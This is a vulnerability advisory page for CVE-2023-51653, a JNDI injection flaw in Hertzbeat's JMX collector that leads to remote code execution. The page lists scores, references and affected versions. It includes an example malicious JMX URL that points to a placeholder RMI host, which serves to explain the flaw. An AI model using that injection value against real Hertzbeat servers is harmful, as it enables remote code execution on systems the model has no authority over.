Vulnerability Details CVE-2023-51653
Hertzbeat is a real-time monitoring system. In the implementation of `JmxCollectImpl.java`, `JMXConnectorFactory.connect` is vulnerable to JNDI injection. The corresponding interface is `/api/monitor/detect`. If there is a URL field, the address will be used by default. When the URL is `service:jmx:rmi:///jndi/rmi://xxxxxxx:1099/localHikari`, it can be exploited to cause remote code execution. Version 1.4.1 contains a fix for this issue.
Exploit prediction scoring system (EPSS) score
EPSS Score 0.036
EPSS Ranking 87.1%
CVSS Severity
CVSS v3 Score 9.8
References
- https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef
- https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg
- https://github.com/dromara/hertzbeat/commit/f794b0d82be49c596c04a042976446559eb315ef
- https://github.com/dromara/hertzbeat/security/advisories/GHSA-gcmp-vf6v-59gg
Products affected by CVE-2023-51653
-
cpe:2.3:a:apache:hertzbeat:-
-
cpe:2.3:a:apache:hertzbeat:1.0
-
cpe:2.3:a:apache:hertzbeat:1.1.0
-
cpe:2.3:a:apache:hertzbeat:1.1.1
-
cpe:2.3:a:apache:hertzbeat:1.1.2
-
cpe:2.3:a:apache:hertzbeat:1.1.3
-
cpe:2.3:a:apache:hertzbeat:1.2.0
-
cpe:2.3:a:apache:hertzbeat:1.2.1
-
cpe:2.3:a:apache:hertzbeat:1.2.2
-
cpe:2.3:a:apache:hertzbeat:1.2.3
-
cpe:2.3:a:apache:hertzbeat:1.2.4
-
cpe:2.3:a:apache:hertzbeat:1.2.5
-
cpe:2.3:a:apache:hertzbeat:1.3.0
-
cpe:2.3:a:apache:hertzbeat:1.3.1
-
cpe:2.3:a:apache:hertzbeat:1.3.2
-
cpe:2.3:a:apache:hertzbeat:1.4.0